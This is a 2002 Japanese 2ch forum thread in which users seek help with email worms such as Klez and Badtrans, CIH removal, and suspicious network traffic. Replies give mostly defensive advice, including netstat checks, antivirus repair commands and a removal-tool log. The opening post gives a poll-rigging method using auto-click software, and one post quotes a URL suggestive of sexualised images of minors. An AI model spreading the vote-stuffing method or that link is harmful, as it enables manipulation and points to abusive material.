──────────────────────────────
「Controversial refereeing decisions」に投票してくれ!!
現在、52-48で負けている!2chの底力を見せてくれ!!
連続投票可!
「vote」のボタンを押し続けてくれ。(画面は2〜3数分毎に更新されます。)
↓↓↓連続投票方法。すごく簡単!↓↓↓
http://www.vector.co.jp/soft/dl/win95/util/se228688.html このソフトをDL。CNN投票ページのControversial refereeing decisionsにチェックをつけた状態で、
間隔の欄に3000〜5000を入れ、F10キーを押して後は放置するだけ。
204 :
いわゆるT ◆uK3kI36M :02/06/24 01:05
>>204 それノートンでスキャンしても反応しないぞ。
シングルクリックで開くようにしてると感染???????????
206 :
名無しさん@お腹いっぱい。 :02/06/24 01:09
いや、中にexeがはいってる。 うかつだった。
207 :
名無しさん@お腹いっぱい。 :02/06/24 02:09
Macですがノートンで遂に警告がでますた。 削除してくれた様ですが Oldgirl Hotline Trojan ってどんな種類のトロイなんでしょうか? Hotlineに関係するものなのですか?
208 :
名無しさん@お腹いっぱい。 :02/06/24 02:56
>>204 ウィルスソフト入れてないの?
オンラインチェックでもやって名前出せばわかるよ。
KlezE付きメールをプレビューしてしまったんですけど、 もうその時点でアウトですか? もちろんそのメールは消しましたが。 対処法教えてくれ。トレンドマイクロのサイト見ても参考にならんのです。
>>155 画像を送ろうとしたらけられました・・・。
212 :
名無しさん@お腹いっぱい。 :02/06/24 13:25
213 :
名無しさん@お腹いっぱい。 :02/06/24 14:02
>>211 まだ言ってるの。その画像をウィルスチェックしてみれ。
ウィルス定義ファイル最新にしてさ。対策ソフト入れてないとか言わないこと。
214 :
名無しさん@お腹いっぱい。 :02/06/24 15:15
スペースキー押すとインターネットエクスプローラーの最初の画面にきりかわる。エンター押すとメールの画面になる。改行もできない。これウイルスですか?どうしたらよいですか?
>>214 何を言ってるのか意味不明
ウイルスと思うならウイルスチェックしろよ
216 :
名無しさん@お腹いっぱい。 :02/06/24 15:40
218 :
名無しさん@お腹いっぱい。 :02/06/24 20:01
すいません。先週あたりからパソコンがおかしいのでどなたか助言をいただけませんか? 症状はネット(電話線から電話をかけてつなぐやつです。)をつなげて 5分くらいたつと、何もしていないのに右下のタスクバー?に出ているパソコンマーク が光り始めて、なんかかってに通信されているみたいなのです。 これってウイルスでしょうか? 使っているパソコンはVAIOです。 どなたか助けて(;;)
219 :
名無しさん@お腹いっぱい。 :02/06/24 20:07
>>218 何でもないと思うけどね。ちなみにOSはWindowsだよね。Auto Update 機能が働いてると
自動的に通信するし、その日のニュースを自動で仕入れてくれるソフトも入っていたりするよ。
キミのにはないかな?
>>218 状況がよーわからんのですが。
まずは。
Windows98やMeならスタート→プログラム→MS-DOSプロンプト
NT系なら、スタート→プログラム→アクセサリ→コマンドプロンプト
んで、netstat(半角スペース)-an
Protocol、Local Address(のうちの、「XX.X.XX.XX:YY」のYYの部分)、Foreign Address、Stateを書いて下さい。
219の人の書き込みの通り、自動メルチェックとか、OSや何かのアプリの自動アップデートチェックだと思うけどね。
222 :
名無しさん@お腹いっぱい。 :02/06/24 20:16
あ、そうなんですか? 一応ウインドウズxpです。 その他の設定は一切触れてないので基本設定のまま?だと思います。 ウイルスではないみたいですね!安心しました。
223 :
名無しさん@お腹いっぱい。 :02/06/24 20:17
ちなみにタスクマネージャーを覗いても、右下のタスクバーを見ても何も変化がないのです。 普通自動アップデートとかするときって何かタスクバーに表示されたりしませんか? 聴いてばかりですいません・・
224 :
名無しさん@お腹いっぱい。 :02/06/24 20:20
ちなみに今そのパソコンを使っていないので220さんがおっしゃっている 操作ができません。すいません。
>>222 >基本設定のまま
それって自慢にならないって思う、まずい。
話がそれるけど。
とりあえず、コントロールパネル→管理ツール→サービス→Remote Registry Serviceを無効にするようにお勧めします。
netstatの結果がわからなければ、メルくれれば見ますが。
226 :
名無しさん@お腹いっぱい。 :02/06/24 20:31
すいません、またそのパソコンを開きしだいご連絡いたします。 ご丁寧にありがとうございました。少し気が晴れました。 全フォーマットかなーって思っていましたので・・・。
>>227 ありゃ、Home Edittionに無かったっけ?すまんっす。
プチ勉強になりました。多謝。
あれ?
230 :
名無しさん@お腹いっぱい。 :02/06/24 22:05
主人が超早漏で困っています。 あまりの早さに、笑いをこらえるのがやっとです。 そしてその後猛烈に虚しくなります。 こんな一瞬で終わるのに、わざわざ服脱がすなよ・・・ という感じで。 本人がそれを情けないとも何とも思っていないのが よけいむかつきます。
で?ウィルスとどう関係があるんですか?リアルウィルスはここでは扱ってませんが?
先ほどぱそを立ち上げてみたところやはり同じような出来事が起こってしまいました。 しかもほかのページを開くのも苦労するくらいすさまじい勢いでダウンロード?がなされているようです。 また先ほどcheshire-catさんがおっしゃってた方法でnetstatコマンド打ってみましたが 始めはあまりなかったのですが、そのダウンロードが始まると、一気に増えました。 コレはどういうことなのでしょうか? またどこのTCP UDP を提示すればよいですか?沢山在るのですが・・・
詳しい方もおられるようなのでご質問をお願いしたいのですが、 私先日、他スレでも話題になっているマンキンにやられました。 OSはXPで、システム用NTFSドライブ80Gと、データ用FAT32ドライブ80G全て逝かれました。 で、そのデータ用のドライブの物理結線を外さず、フォーマットもしないまま、 そのままシステム用ドライブの方をフォーマット後OSを再インストールしました。 そこで、あ!と思い出したようにデータ用のドライブの結線に気付き、 既にシステムは完全に入れ替えた後になって結線を外しました・・(激反省)。 今そういう状態でして、システムドライブをウイルス検索しても何も出てきませんし、 使っていて挙動不審ということもないのですが。 そこでご質問したいのですが、OS再インストールの際、感染したデータドライブを 付けたままだったというのは、これは大丈夫でしょうか? ご面倒おかけします、どなたかヨロシクお願いします。
234 :
名無しさん@お腹いっぱい。 :02/06/25 00:04
>>233 対応予定のトレンドマイクロの説明が無いので分かりませんが、
システムの方が削除されてしまえば感染はしないと思います。
画像なんかにひっつくと言う事はないでしょう。
心配で悩むのであれば、もう一回再フォーマット。
237 :
名無しさん@お腹いっぱい。 :02/06/25 00:19
238 :
名無しさん@お腹いっぱい。 :02/06/25 00:43
W32.HLLW.Kazmor これって危険なの?シマンテックのHP見ただけじゃわからない
>>232 netstat -ano > c:\netstat.logしてlocal addressをメモ帳で編集して
全部コピペすればいい。
>>233 何のウィルスか分からない異常誰も何とも言えません。
>>238 一個所でわからないなら、余所のも見る。
何かjpg画像が勝手にあぼーんしちゃうんですけど、これってウィルスなんですかね? (文字通り画像が「あぼーん」って表示されるんですけど)
242 :
名無しさん@お腹いっぱい。 :02/06/25 01:58
画像落とした時はちゃんと表示されてるけど、しばらくしてから見るといつのまにかあぼーん。 怪しいURLは踏んでないとおもったんだけどなぁ…
メール自体もほぼ使ってないから、ウィルスだとしてもどこで感染したかわからん。 ブラクラなのかな? (連カキコすまそ。パソ初心者だからどうしていいかわからんで途方にくれてます)
245 :
名無しさん@お腹いっぱい。 :02/06/25 03:00
apacheの話題があんまりでてないけどなぜなんだろう・・・ 攻撃するコードも出回ってるしこれがウィルスにでも 仕込まれたらCodeRedの再来に・・・ いや、もっとすごい祭りになりそうな予感がするのは俺だけ?
246 :
名無しさん@お腹いっぱい。 :02/06/25 03:16
Windows XPなのですが、エクスプローラでprogram filesをチェックしていたら、「xerox」っていうフォルダができていて、 その中には、「nwwia」っていうフォルダがあり、その中は空でした。それで、あやしいと思って、 フォルダを削除しようとしたら、そのプログラムが使用中ですというメッセージがでて削除できません。 今のところPCに異常はないですが、とてもあやしいフォルダです。対処法を教えてください。
247 :
名無しさん@お腹いっぱい。 :02/06/25 03:23
あのー、「whismng.exe」を検索してみたら1個ファイルが出たんですが これは危ないんでしょうか?
249 :
名無しさん@お腹いっぱい。 :02/06/25 03:28
>>246 安全なもんだったと思うけど。ゼロックスでしょ。
x が抜けた erox はダメだけどね。
251 :
名無しさん@お腹いっぱい。 :02/06/25 03:51
>250 バスター最新版に引っかからないんだけど...。
252 :
名無しさん@お腹いっぱい。 :02/06/25 04:08
>249 それは、どういったものなんですか?ゼロックスって? どうやって削除したらよいのですか? ?ばっかりですいません。
253 :
名無しさん@お腹いっぱい。 :02/06/25 04:15
>249 すいません、ヤフーでnwwiaを検索したらでました。 やっぱり、ウイルスと間違う人いたんですよね。 だって、xeroxだもん、エロがバツで囲まれてて、削除できないなんて、とってもこわい。 今日の探偵日記のオカルトHPもたいがい怖かったけど。
あの、ウイルスかもしれない添付メールを 「差出人」へとやって、送り主確認するのは あまり良くない行為ですか?
(=・ェ・=)ううん。。
いままでIEのアイコンをクリックするだけでネットに 繋がってたんですが、なぜか オフラインです、つなげますか? と聞いてくるようになりました。 やばいですか?
ADSLでした。 ダイアルアップモデムは付けてません。 JC_NOCLOSEと言うウイルスに感染したことが あります。
>オフラインです、つなげますか? 「要求されたWebページは、オフラインで使用できません。 このページを表示するには、[接続]をクリックしてください。」じゃなくて?
ウィルスが送られてくる方にメールをしたら「自分も被害者なので私のメアドを 受信拒否してください」とのことでしたがメアド受信拒否ってどうやるのですか?
>>260 鯖で拒否する→ISPのサポートに聞け
メーラで拒否(削除)する→メーラのマニュアル嫁
以前、ワームが立て続けに送られてきたので、相手方ISPを割り出し、メールを送りますた。 送信サーバのISPと接続に使ってるISPが別々だったので、両方に。 で、送信サーバのISPからはすぐに返事が返ってきて、 調査の上、該当者が判明した場合は利用規約に基づき対応致します・・・という返事。 その後、ワームは来なくなった。(某Dネット) で、問題は接続に使ってると思われるISP。 数日後に返事が来たと思ったら、関係部署へメールを回します。だと。 で、それから数週間経ってメールが来た。 「インターネットが一般的になるにつれ、Yahoo! JAPANのサービスが悪用される ケースも増えております。 お知らせいただきました件については、利用規約とガイドラインに照らし、 チェックさせていただきます。」 というコピペメール。未だにログも見てないらしい。 しかもYBBのサポートに送ったのに、何故Yahooメールの方から連絡が来る? もうすでに解決したからいいけど、もしこれがYBBのみのユーザだったら、 ISPの対応はほとんど望めません。というか、こんなトロい&危機感のないところが プロバイダーをやってるって事が驚き、というか恐すぎ。
263 :
名無しさん@お腹いっぱい。 :02/06/25 16:04
>>260 サーバーで拒否するやり方は知らないけど、Outlook Express 5.5 だと、受けたメールを
送信者で分類して削除済フォルダに入れることはできる。それなら個別に触らず削除可能。
ツール→メッセージルール→禁止された送信者の一覧 でルール編集。
Macですがノートンで遂に警告がでますた。 削除してくれた様ですが Oldgirl Hotline Trojan ってどんな種類のトロイなんでしょうか? Hotlineに関係するものなのですか? マカーだからレスつかねえ、HP調べてもひっかからねえ。 ノートン内のデータベースには名前があって検索できんのにな。。
265 :
名無しさん@お腹いっぱい。 :02/06/25 16:54
>>255 それがKLEZだった場合、送り返した先は感染者とは無関係の場合がほとんど。
あなたのせいでその人を感染させる危険があります。
268 :
名無しさん@お腹いっぱい。 :02/06/25 19:02
(^∀^)ゲラゲラ 携帯に送ってどうしようってんだ
>>268 携帯からクレズなんか送られてくるはずない。
ここでクイズです。携帯からWORM_KLEZ.Hを飛ばせるか? __ __ __ |無理| ΛΛ |OK| ΛΛ |無理| ΛΛ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 〃 ̄∩ ゚Д゚) 〃 ̄∩ ゚Д゚) 〃 ̄∩ ゚Д゚) < わかりません・・・? ヾ. ヾ. ) ヾ. \_____________  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ \ \ | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| | クレズ製作委員会 | | | \| |
272 :
名無しさん@お腹いっぱい。 :02/06/25 22:47
また来たよ・・・。 差出人が「admin」で タイトルが「Language」。 ファイルサイズが122kバイトとやたらに大きい。 恐らくウィルスでしょうね。
274 :
名無しさん@お腹いっぱい。 :02/06/25 23:07
毎回違う英語の題名で内容も全て英語で添付ファイルの付いたメールが毎日送られてきます。 プロバイダにウィルスチェックしてもらってます。 ファイルを開くと以下のような英文が2行あるだけで何も起こりません。 File attachment: Ait.bat The file attached to this email was removed because it was infected with the W32.Klez.gen@mm virus. 以前はパソコンに来てましたが、最近はパソコンには一通も来なくなり、携帯メールにだけ送られてきます。 これって何ですか?やっぱりウィルスですか? 送っている方はやはり恨みでもあるんですかねえ? 大抵違うアドレスからです。たまに以前と同じ時もあります。
275 :
名無しさん@お腹いっぱい。 :02/06/25 23:40
>>274 >プロバイダにウィルスチェックしてもらってます
だから、そこでウィルスが駆除されてるんだって。
クレズが入っていたから添付ファイルを取り除きましたって書いてあるよ。
277 :
名無しさん@お腹いっぱい。 :02/06/26 00:34
今日は2通きたよ。YAHOOのメアドに。 「HI、******(ID)、HONEY」ってやつと、 「INTRODUCTION ON ADSL」ッて奴。 両方とも内容無しの添付ファイルのみ。速攻削除。
279 :
名無しさん@お腹いっぱい。 :02/06/26 02:15
URLクリックすると必ずbbspinkとか言うところに飛んでしまいます。
それにしても、サーバーの段階でウィルスを取り除いてくれる?サービス利用者多いね。 安いのかな? だって、ウィルス定義最新で、添付ファイル開かないで、OE以外のテキスト系メーラー つかってれば必要なくなくなくなくなくなくな〜い?
>>279 なんか初級ネットでも見たような。マルチ多いなあ。
283 :
名無しさん@お腹いっぱい。 :02/06/26 09:40
>>281 添付ファイル開かないで、OE以外のテキスト系メーラー使っていれば
その他にはなにもいらないけどな(w
>>281 ウィルス定義の年間購読料考えると200円/月位は手間いらずでいいんじゃないの。
普通です。 はい次の方どうぞ
>>285 手動で削除しないと飛べないんです。
どうしてこれが普通なんですか?
>>285 ime.nuが逝ってしまっている際には、いったんime.nuに逝けないので
エラーが起こるが、実はいつも付けられる仕様になっている。
直リンクリックせず、範囲指定してコピペか、
アドレス欄でちょこちょこっと消してエンターキーでOK。
もっと知りたかったら、初心者の質問板か批判要望板へ。
2chからの直リンはそういう風になるようになってんの。 ブラクラ、ウィルス踏んでも文句いうなよってのと 2chからのリファラ落とすのが目的じゃねーの? >手動で削除しないと ime.nuの画面でリンク出るだろうが。それ踏め
被ったし、丁寧な説明やねえ。 なんでもかんでもウィルスやスパイウェアのせいにする厨は嫌いや・・・
ということはみんな今直リンできない状態ですか?
>>291 だから、そういうの知りたい場合は初心者の質問板か
批判要望板へって。ウイルスじゃないことはたしかなんだし、
2ちゃんの仕様に関することだって分かったんだから。
分かりました。逝ってきます。ありがとう。
批判要望板が真っ白なのですがどうして?
・・・(w
ちなみに批判要望板は落ちてないぞ
みなさん批判要望板は普通にみれますか。
>>297 更新かリロードするとか、Ctrl+F5やってみるとか
時間をおいていくなり、初心者の質問を見てみるなり、
インターネットキャッシュのクリアするなりしてみてくれ。
ここでアンケート募るべき問題ではないと思う。
>285 もう来んな。
301 :
こんなのきました :02/06/26 13:29
Date: Wed, 26 Jun 2002 12:39:16 +0900 (JST)
From: kyojack <
[email protected] > | このアドレスを受信拒否 | アドレスブックに追加
To:
Subject: A humour game
Hello,This is a humour game
This game is my first work.
You're the first player.
I hope you would like it.
添付
file.html
タイプ .html ファイルを保存
添付
rock.exe
タイプ .exe ファイルを保存
添付
file.txt
タイプ .txt ファイルを保存
添付
dianne2-thumb-986072648
タイプ ファイルを保存
スパマーにメルアド握られるようなヘタレだし。
メールが一通も来ない屁垂れだし。
307 :
たしけてーーーー :02/06/27 19:02
1.最近何度か妙なメールで、プレビューするだけで勝手にWMPが開いて、ってのが 何度かあった。『リダイレクトに問題が発生したため開けませんでした』 ってメッセージが出る。 2.それと関係してかどんどんアプリケーションが使えなくなってきた。 dllファイルがなくなってたり、×マーク画面に英語でメッセージ出て立ち上がらなかったり。 3.やばそうなんでとりあえず重要なデータはCDRに逃がそうかと思ったらライティングソフト (EasyCD Creator4)が立ち上がらない。やっぱり×に英語のメッセージ。 再起動したら《CDUDFLIB.DLLが見つかりません》って出て、その後はボロボロ。 スキャンソフト走らせようとしても消えてて、ネットでスキャンしようと思ったら 接続できない。 4.しゃーないから必要最低限のデータはDドライブに入れてフォーマット。 5.フォーマット終了後、すぐにプロバイダのウィルスチェックサービスに入った。 (ASAHIネット)3時間以内に有効になると聞き3時間経ってから再起動。 6.しかし2と同じような症状。プリインストールのウィルススキャンは起動して 数秒で消えて使い物にならない。 7.更にフォーマット、最初の内はCDライティングソフトもウィルススキャンも行けた。 スキャンして感染もなかった。 8.2時間が経ってさっきまた立ち上げたら2の症状が(T_T) 何なんでしょう。。。ちなみにOSは98SE、IE6、OE、スキャンはマカーフィー、 FMVのME4/657、フレッツ1.5Mで接続してます。 まったく仕事になりません、助けて下さい........
( ´_ゝ`)ふーん。そりゃ困った困った。
>>307 まさか再インストール後にそのメールをプレビューしたりしてないよね?
マカフィーはちゃんと更新してるよね?
>>307 1. 必要最低限のデータ ←これ怪しい。。
2. ハードディスクが逝ってる。
ttp://home9.highway.ne.jp/ando-ke/menu.html このサイト覗くと、NortonAntiVirusが一瞬だけ反応します。
発信メールのスキャン云々って文字が見えるんですが…
かと言ってmailboxには何も無し一体なにしてるんでせうか?
OSはwin2k、UpDateを常に心がけてます
ブラウザはopera6をMSIE5として認識させてます
javaプラグイン等を全てオンにしとくと成ります。
動作確認済みブラウザに含まれて無いのも解ります
java関係が妖しいのもなんとなく解ります。
ただ、他のサイトではこのような問題起きなかったし
誰か見知らぬ人にmailが送られているようでしたら大変です。
お手数ですが誰か解る方、ご教授お願いします。
313 :
名無しさん@お腹いっぱい。 :02/06/27 23:08
(272と同一人物) どうやらKlezには感染してなさそうです。 落とし込まれたファイルやレジストリの書き換えが見当たりません。 でもしっくりきません。 WindowsのSystemフォルダに「KERNEL32.EXE」というフォルダが見つかりました。 ファイルではなくフォルダなんですが、これは一体・・・。
314 :
名無しさん@お腹いっぱい。 :02/06/27 23:16
昨日突如フリーズ>再起動>レジストリが不正ですので修復します >!?なんか3ヶ月ぐらい前の状態に戻ってる>復元>ウマー >ウイルスチェック>W95/chi10ハケーン なのです。で、今あちこちのサイト検索して駆除しようとしているのですが イマイチわかりません。助けてください 今使用しているOSはmeです。本日ウイルススキャンオンラインを購入してきて 駆除しようと思いましたが、ウイルスを発見するだけで削除、駆除ができません (ノー豚買えばよかった・・・)
315 :
名無しさん@お腹いっぱい。 :02/06/27 23:18
316 :
名無しさん@お腹いっぱい。 :02/06/27 23:31
317 :
名無しさん@お腹いっぱい。 :02/06/27 23:33
いやいや、McAfeeだけど、現在エンジン古すぎて定義ファイルに追いついてない。
318 :
名無しさん@お腹いっぱい。 :02/06/27 23:35
320 :
名無しさん@お腹いっぱい。 :02/06/27 23:41
321 :
名無しさん@お腹いっぱい。 :02/06/27 23:42
>>317 とにかく最新の定義でなきゃ対策ソフトの意味なし。
>>316 それは昨日やりましたが、次のnavcという物を落として起動した時点で
わからなくなったのであきらめてしまいました。ここから先はどうすればよいのでしょうか?
323 :
名無しさん@お腹いっぱい。 :02/06/27 23:47
>>321 むしろ、エラー起こしてエンジン自体が強制終了・・・。
とりあえず、Trend Microのツール実行後のログファイルを下に書きます。
================================================================
Start : FIX_BADTRANS version 1.10
Windows Platform : Windows 98
Tool configuration:
Scan Files: Yes
Quiet Mode: Yes
Date and Time: Thu Jun 27 23:45:47 2002
I. Terminating Worm/Virus processes.
*** Infected processes were NOT found. ***
II. Cleaning System Registry.
WORM_BADTRANS.B not found in the SYSTEM REGISTRY
III. Removing drop files.
File "C:\WINDOWS\SYSTEM\kernel32.exe" not found
File "C:\WINDOWS\SYSTEM\kdll.dll" not found
File "C:\WINDOWS\SYSTEM\cp_25389.nls" not found
IV. Inoculating the system.
Creating [KERNEL32.EXE]. Folder created.
System Inoculated
Stop
Date and Time: Thu Jun 27 23:45:48 2002
========================================================
325 :
名無しさん@お腹いっぱい。 :02/06/27 23:52
>>323 名無しだからわからないYO!
なんでそのツール実行した?
感染の疑いがあったのか?ワケわからん・・・
326 :
名無しさん@お腹いっぱい。 :02/06/27 23:52
327 :
名無しさん@お腹いっぱい。 :02/06/27 23:56
>>325 インターネット接続直後に、こっちの意図とは無関係に
データの送受信が数秒間行われた。
もしかしたら個人情報がどこかに送信されたのではないかと思って。
328 :
名無しさん@お腹いっぱい。 :02/06/27 23:57
>>322 Special instructions for installing and using the special NAVC for W95.CIH:
カイドク中だから30分くらい待っててくれ。
329 :
名無しさん@お腹いっぱい。 :02/06/27 23:59
>>327 それでどーしてFIX_BADTRANS version 1.10 が出てくるんだYO!
331 :
名無しさん@お腹いっぱい。 :02/06/28 00:03
>>329 原因が、メール見ただけで添付ファイルを実行しようとするやつだったから。
一応ブラウザはIE6だから、ブラウザやOutlookExpressでも一発感染はないはずなのだが、
念のため。
332 :
名無しさん@お腹いっぱい。 :02/06/28 00:06
(331に追加) 先日、そのような怪しいメールが3通来て、 そのうちの1通の差出人が「admin」だったから。
いま330で書いた方法でチャレンジしました。 只今ウイルスチェック中・・・
334 :
名無しさん@お腹いっぱい。 :02/06/28 00:21
(332と同一人物) とりあえずAntidoteの無償版をダウンロードしたので、今からチェックかけます。 ありがとうございました。
>>322 わかったことだけ書く。ノートンのレスキューディスクを使えとあるが、
普通の起動ディスクで代用できるかどうか。
まずマイコンピュータでC:を選んで新規フォルダを作成する。名前はNAVC。
DLしたnavc10.exeをそのフォルダに入れる。
(ノートンレスキューディスク)フロッピーから(!!)PCを再起動。そして、
type "c:" and then press enter. (c:を入力)
Next type "cd \NAVC" then press enter. (引用符内を入力)
Next type "NAVC10" then press enter.(NAVC10と入力)
At this point it will ask you if you want to unzip files.
(↑ここで圧縮ファイルを解凍するか聞かれるので、)
Type "yes" for yes.(yesを選択)
次に。
type "NAVC C: /doallfiles /repair". (長いけどこれを入力)
ここで駆除作業が始まる。
終わったらフロッピーを抜き、再起動。
と、こうだが、問題は起動ディスクを持ってるか、そしてそれでうまくいくか、だね。
>>330 どうだろうね。使用したアンチウィルスソフトを信用できるなら、結果オーライということ。
>>334 了解ですが、「KERNEL32.EXE」フォルダができた理由はわかるよね?
ウィルスの名前がわからないうちに特別なツール使う必要は・・・
ま、いいです。
338 :
名無しさん@お腹いっぱい。 :02/06/28 00:57
>>337 Antidoteチェックの結果
\Windows\TEMP フォルダ内に「Badtrans」発見。
ただ、レジストリに書き込まれてないので感染してはいないようだ。
もしこれで感染したというのなら、亜種か新種しかありえない。
>>338 それ削除できた?
メール受信時にノーチェックだと、そのメールを少しいじった時に
TEMPファイルに入るんじゃないかな?実行されなくても。
340 :
名無しさん@お腹いっぱい。 :02/06/28 01:07
>>339 削除しました。絶対に左クリックしないように慎重に。
342 :
名無しさん@お腹いっぱい。 :02/06/28 01:17
>>339 とりあえず、一件落着(にしておきましょう)。
ありがとうございました。
>>340 あ、TEMPフォルダの中のファイルを、削除できましたか?
345 :
ウヨク氏ね :02/06/28 13:43
348 :
名無しさん@お腹いっぱい。 :02/06/28 21:36
知らない間にマンキン.exeなんか入ってたよ。 やっぱりうpロダでむやみにファイル落とすのは危険だな。
349 :
名無しさん@お腹いっぱい。 :02/06/29 03:03
回線はADSLでルーターを使用してネットをしているんですが 最近よく通信が途絶えるようになり、その時にログを 見るとこんな状態になっています。 送信元 送信先ポート 送信先 TCP *.*.*.* 1362 1362 *.*.*.* 80 0 TCP *.*.*.* 1374 1374 *.*.*.* 80 0 TCP *.*.*.* 1375 1375 *.*.*.* 80 0 〜1395 4153まで <No UDP Sessions> 送信元は自分のIPで、どうやらIEでアクセスした サーバにポートスキャンをかけていると言う感じがするのですが、 このような動作をするウィルスをご存知の方おられませんか?
350 :
名無しさん@お腹いっぱい。 :02/06/29 19:02
スマン質問なんだがときどきネットに接続してると「例外OEからの呼び出しです。」って 言う蒼い画面になって再起動か電源押しっぱなしで強制終了しかないんだけどこれって アタック?最近これになるのが多くて困るんだよ・・・
353 :
名無しさん@お腹いっぱい。 :02/06/29 19:57
>>352 スキャンディスクなどやって問題なければレジストリ再構成。
354 :
名無しさん@お腹いっぱい。 :02/06/29 20:03
>>353 って事はこの状態は避けようがないの?毎回再起動されると鬱にならないか?
>>355 Norton UtilityとかFirst AIDとかのユーティリティソフト使ってスキャンって手も。
これ系のツールは「変なパソが何とかうまくやって来た」のを、「無理矢理正しい?状態に設定」させるんで、かえって不具合生じたりする事もあるんで、自己責任でやってちょ。
なお実行前に、ユーティリティソフトはUpdateした方が良い。
古いバージョンで新しいOSとかサービスパック導入機をスキャンするのって、自殺行為だから。
357 :
名無しさん@お腹いっぱい。 :02/06/29 20:14
>>355 だからレジストリ適性化するソフト探してみて。
358 :
名無しさん@お腹いっぱい。 :02/06/29 20:16
>>356 .357.358
ありがdm(_ _)m
よくわからないexeウイルスにマイドキュメントフォルダ消されてしまいました。。。 Eの中全部とマイドキュメント全部消されたのですが復元は可能でしょうか? どうか!!どうか!おねがいします!!
よくわからない.exeはここでは初出です。 最近は上書きするので、おそらく駄目でしょう。
362 :
名無しさん@お腹いっぱい。 :02/06/29 21:38
363 :
名無しさん@お腹いっぱい。 :02/06/29 22:10
364 :
名無しさん@お腹いっぱい。 :02/06/29 22:11
tp://ime.nu/yahoo5briefcase.vr9.com/preteen/__tn___________kidsux.jpg を見ようとしましたが、リンク切れ(?)で見れませんでした。 しかし、その後PCの未使用ポートが勝手にアクセスしようとしてます。 ウイルスですかね? また駆除方法ってありますか? ちなみに"Winstart.bat"というファイルはありません。 よろしくお願いします
369 :
名無しさん@お腹いっぱい。 :02/06/30 00:23
検索してみたけどいまいち分からないのでどなたか教えて下さい。 gooのフリーメール使ってます。KLEZとかあほみたいにいっぱい来ます。 で、そんなウイルスメールはサクサク消してるんですが、 最近件名が日本語の物がよく来るんです。『もう少し』とか色んな言葉で。 開いてもエラーになるのでそのまま削除してますけど、 これもウイルスメールなんでしょうか? 今日は『Honey 【重要】 フィルタルールによっ て、メールの送信が行われませんでした 』 という件名のメールが来て、 開くと本文は全て文字化け(数字とアルファベットの羅列)みたいな状態でした。 添付ファイルはありません。 いかにも送信出来ませんでしたな感じですが、 gooのFAQには送信出来なかった場合のメッセージについては書いてなかったし。 ウイルスメールが多いだけに何がなんだか良く分からなくなってしまいました。 こんなウイルスメールもあるんでしょうか?
370 :
名無しさん@お腹いっぱい。 :02/06/30 00:58
>>369 開いて表示してる画面で右クリックしてソースを表示させる。
なにかわかるかもね。
ウィルスメールの可能性が高いけど、 実物みているのはアナタだけなんで、第三者には断言できません。 数字とアルファベットの羅列て事は、 添付書類のデコードが巧く行かなかったて事でしょう。
>>370 >>371 ありがとうございます。
確かにいくら説明しても見ている私しか分からないことですよね・・・。
とりあえず日本語のはどれもまともに開かないメールなんで、
深く考えない事にします。
送信出来なかったというメールも身に覚えがないし。
371さんに言われてそういやそうだなと思いました。(数字とアルファベットの羅列)
お尋ねしておいて自分で勝手に納得してごめんなさい。
ありがとう。
差出人がmfjmr タイトルがInternet Explorer(IE) というメールと 差出人xxx タイトルLet's be friends というメールが来たんだけど どちらも添付ファイルはなし、けどサイズが130kb程ある。 yahoo!のメール使ってるんだけど開いて見てみてもも大丈夫ですか?
374 :
名無しさん@お腹いっぱい。 :02/07/01 10:03
375 :
ふしんメール :02/07/01 12:38
373さんと似たような問題なんですが、、、 差出人:ryo タイトル:cellpadding /131k 差出人:blader タイトル:onmouseover /138k 添付ファイル無し。サイズが大きく タイトルがHTML関連の言葉らしいので、なんだか怪しいです。 自宅にて、ホットメールの受信トレイのプレビューで確認しました。 まだ怖くて開いていませんが、インターネットカフェで開いてみようかと 思っています。その場合でも、 パスワード等の流出の可能性があるウィルスではないかと心配です。 開いてみても大丈夫でしょうか?
・ウィルスでしょうか → アンチウィルスソフト常駐させよ。 ・「開いてみて大丈夫でしょうか → 同上、件名・送信者名だけでウィルスの 種類がわかるのは今では少数派。 ・感染したのでしょうか → オンラインウィルススキャンしろ。
377 :
名無しさん@お腹いっぱい。 :02/07/01 14:39
>>375 捨てればいいでしょう。興味本位で開いてカフェのPCを感染させたら関係ない
人間にウィルスがおくられるよ。
378 :
名無しさん@お腹いっぱい。 :02/07/01 16:28
>>375-376 感染している可能性を知りつつネットカフェでメールを開きPCに感染させ
た場合、故意または重大な過失があるのでネットカフェに損害を賠償する
必要があります。
故意の場合には威力業務妨害などの刑法犯にもなります。
>>375 自分のPCでは開きたくないメールも他人のPCでは平気なのか?
自己中もここまでくると呆れて物も言えんわ。
返答ありがとうございます。 パニックになってしまったが為の 衝動的で理性を失った言動をお許し下さい。 インターネットカフェでは調べません。 内容が、就職活動先の企業のものかもしれませんが、 タイトルだけ見ると怪しそうなので、素直に削除します。
382 :
名無しさん@お腹いっぱい。 :02/07/01 21:10
>>381 >内容が、就職活動先の企業のものかもしれませんが
それはない。
384 :
名無しさん@お腹いっぱい。 :02/07/01 22:38
>>383 そこからウィルスがばら撒かれることについては?
385 :
名無しさん@お腹いっぱい。 :02/07/01 22:46
他の板でこんなのを見つけたのですが… >通称2chウィルス(正式名称はしらない) >C:\WINDOWS\SYSTEMの中にsage.exeっていうのがあれば感染してる。 >ひろゆきにメールを送ればワクチンを送ってくれるってさ。 >ちなみに放っておいても実害は全く無いよ。 >普通に書き込みしたつもりが、10回に1回の確率でsageになるらしい。 >削除したりしたらダメだよ。 >変にいじると悪化するからね。 >放っておくのが一番だってさ。 …今見てみたらありました…ショックです。 これは本当なのでしょうか?
ネタです。www
387 :
名無しさん@お腹いっぱい。 :02/07/02 00:08
超初心者の質問なのですが、さっきメール一通来てたんで なんとなくリズミカルにあっという間に開いてしまったのですが、 なんかクリップ付いてるしこれってウイルス??!!ってアセりまくって もうなにがなんだか怖すぎて削除して、ごみ箱もいっきに空にしてしまって よく見ませんでした 今のところPCにはなにも起こってないのですが、これからどうなるんでしょうか? それと、どうすればいいのー?! 明日の朝サポートセンターに電話できるまで待てません。。。
388 :
名無しさん@お腹いっぱい。 :02/07/02 00:10
